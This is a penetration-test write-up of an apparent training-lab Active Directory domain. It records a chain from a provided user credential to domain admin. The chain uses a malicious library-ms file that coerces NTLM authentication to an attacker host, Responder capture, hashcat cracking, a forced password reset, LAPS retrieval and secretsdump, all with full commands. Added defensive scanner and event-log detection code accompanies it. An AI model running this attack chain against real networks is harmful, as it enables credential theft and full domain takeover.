Objective / Scope

Lumon Industries will soon be integrating a high-value employee into the organization. In accordance with internal security protocols, a comprehensive penetration test and internal access verification must be conducted prior to full onboarding.

For this assessment, valid credentials were provided for a standard domain user. The goal was to understand what level of access this account truly had, identify any escalation paths, and determine whether internal controls would prevent an attacker from moving laterally or escalating privileges.


Starting Credentials

hellyr:H3lenaR!2025

Reconnaissance & Information Gathering

Host Resolution

To ensure consistent hostname resolution during testing, the following entries were added locally:

sudo tee -a /etc/hosts << 'EOF'
10.0.23.195 DC01
10.0.16.195 INTRANET
EOF

A reusable target list was also created:

cat << 'EOF' > targets.txt
10.0.23.195
10.0.16.195
EOF

Network Scanning (Nmap)

An initial full port scan was performed to identify exposed services:

nmap -Pn -p- -sC -sV -iL targets.txt --open -oA nmap/scan --min-rate 3000

Based on service banners and responses, the Active Directory domain was identified as:

lumons.hacksmarter

For completeness, the following FQDNs were also noted:

DC01.lumen.hacksmarter
INTRANET.lumen.hacksmarter

SMB Enumeration

With valid credentials and SMB available on both hosts, share enumeration was performed using nxc:

nxc smb targets.txt -u 'hellyr' -p 'H3lenaR!2025' --shares

Most shares were standard administrative or system shares. One share on INTRANET stood out:

MDRepo          READ,WRITE

This writable share presented an opportunity for credential capture.


Initial Exploitation – NTLM Capture via Writable Share

The MDRepo share allowed arbitrary file uploads. In real environments, attacks relying on user interaction often require patience. In this lab environment, interaction occurred quickly.

After initial manual attempts, a public proof-of-concept was used to generate a malicious file:

python3 CVE-2025-24054_CVE-2025-24071-PoC/exploit.py 10.200.30.11 -s share

File xd.library-ms successfully generated, pointing to \\10.200.30.11\share

The file was uploaded to the share:

smbclient.py hellyr@INTRANET
# use MDRepo
# put xd.library-ms

Responder was started to capture authentication attempts:

responder -I tun0

After a short period, NTLMv2 credentials were captured.

Captured NTLMv2 hash from MDRepo interaction
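From the defender's side, the same writable share can be swept for library files whose location points at a host the organisation does not own. The following scanner is an added example, not part of the original assessment or the PoC; the trusted-host allowlist and both sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumed allowlist of hosts that legitimately serve shares in this environment
# (taken from the hosts file entries above); any other UNC target is suspicious.
TRUSTED_HOSTS = {"10.0.23.195", "10.0.16.195", "dc01", "intranet"}

# Matches a UNC path such as \\host\share and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

def unc_host(url):
    """Return the host named in a UNC path, or None if url is not a UNC path."""
    m = UNC_RE.match(url.strip())
    return m.group(1) if m else None

def scan_library_ms(xml_text):
    """Return (url, host) pairs for every <url> element pointing at a non-trusted host.

    Tags in .library-ms files are namespaced, so only the local tag name is compared.
    Malformed XML yields no findings, since Explorer would not parse it either.
    """
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] != "url" or not elem.text:
            continue
        host = unc_host(elem.text)
        if host and host.lower() not in TRUSTED_HOSTS:
            findings.append((elem.text.strip(), host))
    return findings

# Constructed sample with the same external UNC target the text describes.
SUSPICIOUS_LIBRARY_MS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\\\10.200.30.11\\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed benign counterpart that points at the organisation's own share.
BENIGN_LIBRARY_MS = SUSPICIOUS_LIBRARY_MS.replace("\\\\10.200.30.11\\share", "\\\\INTRANET\\MDRepo")

if __name__ == "__main__":
    for url, host in scan_library_ms(SUSPICIOUS_LIBRARY_MS):
        print(f"suspicious library target {url} (host {host} not trusted)")
```

Run the same check over every *.library-ms found on a share listing, and treat any hit as an NTLM coercion attempt worth correlating with Responder-style traffic.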


Credential Cracking

The captured hash was cracked using Hashcat:

hashcat -m 5600 harmonyc.hash /usr/share/wordlists/rockyou.txt

Cracked Harmonyc Hash

The recovered account belonged to a manager but did not immediately provide administrative access.


Secondary Enumeration & Credential Capture

While reviewing files in the MDRepo share, a PDF referencing an internal intranet portal was discovered. Logging into the portal confirmed that the compromised user had managerial access.

Intranet Login

The admin interface allowed browsing a file share. Reusing the previously established SMB listener triggered another NTLM authentication attempt, this time from a service account.

Captured NTLMv2 hash from Intranet

The new hash was cracked:

hashcat -m 5600 intranetsvc.hash /usr/share/wordlists/rockyou.txt

Intranetsvc Hash Crack


Lateral Movement Analysis

Direct access attempts via SMB, RDP, and WinRM did not immediately succeed. At this point, directory-level analysis was required.

BloodHound Collection

nxc ldap 10.1.6.124 -u 'hellyr' -p 'H3lenaR!2025' -d lumons.hacksmarter --dns-server 10.0.23.195 --bloodhound --collection All

Privilege Relationship Analysis

The following query was used to identify high-impact permissions:

MATCH p=(n:Base)-[r:GenericAll|GenericWrite|WriteOwner|WriteDacl|ForceChangePassword|AllExtendedRights|AddMember|AllowedToDelegate|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|WriteGPLink|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->(:Base)
WHERE (n:User OR n:Computer)
RETURN p
LIMIT 1000

The INTRANETSVC account was able to force password changes for multiple users, including MARKS.

Force Change Password


Privilege Escalation – Password Reset and LAPS

The password for MARKS was reset:

bloodyAD --host 10.0.23.195 -d 'lumons.hacksmarter' -u 'INTRANETSVC' -p '<REDACTED>' set password "MarkS" "Password1"

[+] Password changed successfully!
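A reset like this lands in the Security log as event 4724 on the domain controller, with the service account as the subject and MARKS as the target. The detection below is an added example, not part of the original assessment; the event records are constructed JSON lines with the standard 4724/4738 EventData field names, and the three account lists are assumptions about the environment.

```python
import json

# Constructed sample of Security events exported as JSON lines.
# 4724 = "An attempt was made to reset an account's password", 4738 = "A user account was changed".
SAMPLE_EVENTS = """
{"EventID": 4724, "TimeCreated": "2025-06-01T09:12:03Z", "SubjectUserName": "INTRANETSVC", "TargetUserName": "MarkS", "TargetDomainName": "LUMONS"}
{"EventID": 4738, "TimeCreated": "2025-06-01T09:12:03Z", "SubjectUserName": "INTRANETSVC", "TargetUserName": "MarkS", "TargetDomainName": "LUMONS"}
{"EventID": 4724, "TimeCreated": "2025-06-01T10:40:51Z", "SubjectUserName": "helpdesk01", "TargetUserName": "hellyr", "TargetDomainName": "LUMONS"}
{"EventID": 4724, "TimeCreated": "2025-06-01T11:00:00Z", "SubjectUserName": "hellyr", "TargetUserName": "hellyr", "TargetDomainName": "LUMONS"}
"""

SERVICE_ACCOUNTS = {"intranetsvc"}      # assumed: accounts that should never reset passwords
AUTHORISED_RESETTERS = {"helpdesk01"}   # assumed: staff tier allowed to reset user passwords
SENSITIVE_USERS = {"marks"}             # assumed: LAPS administrators and other high-value accounts

def detect_suspicious_resets(jsonl):
    """Return one alert per 4724 event that violates the reset policy above."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev["EventID"] != 4724:
            continue
        actor = ev["SubjectUserName"].lower()
        target = ev["TargetUserName"].lower()
        if actor == target:
            continue  # a user changing their own password is reported separately as 4723
        reasons = []
        if actor in SERVICE_ACCOUNTS:
            reasons.append("service account reset another user's password")
        if target in SENSITIVE_USERS:
            reasons.append("target is a high-value account")
        if actor not in AUTHORISED_RESETTERS:
            reasons.append("actor is not an authorised resetter")
        if reasons:
            alerts.append({"time": ev["TimeCreated"], "actor": actor,
                           "target": target, "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for a in detect_suspicious_resets(SAMPLE_EVENTS):
        print(a["time"], a["actor"], "->", a["target"], "|", "; ".join(a["reasons"]))
```

The same ACE that BloodHound reported as ForceChangePassword is what makes the first event possible; removing it from INTRANETSVC closes the path, and the alert covers the gap until that is done.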

Because MARKS was a member of the LAPS administration group, local administrator credentials could be retrieved:

GetLAPSPassword.py lumons.hacksmarter/marks:Password1 -dc-ip 10.0.23.195

INTRANET$  localadmin  <REDACTED>

Lateral Movement via RDP

nxc rdp 10.0.16.195 -u 'localadmin' -p '<REDACTED>' --local-auth

xfreerdp /v:10.0.16.195 /u:localadmin /p:<REDACTED>

Local Admin RDP


Domain Compromise

To validate domain-level impact, cached credentials were dumped:

secretsdump.py 'lumons.hacksmarter/marks:Password1@INTRANET'

Secrets Dump

The recovered DCC2 hash was cracked:

hashcat -m 2100 hellye.hash /usr/share/wordlists/rockyou.txt

Status...........: Cracked
Hash.Mode........: 2100 (DCC2 / MS Cache v2)

With Domain Admin credentials recovered, access to the domain controller was established:

xfreerdp /v:10.0.23.195 /u:hellye /p:'<REDACTED>'

Domain Admin


Final Assessment Summary

This assessment demonstrated how a single set of valid credentials could be leveraged to achieve full domain compromise through a series of small but compounding misconfigurations:

  • Writable SMB shares
  • NTLM credential capture
  • Over-permissioned service accounts
  • Excessive password reset rights
  • Broad LAPS access
  • Cached credential exposure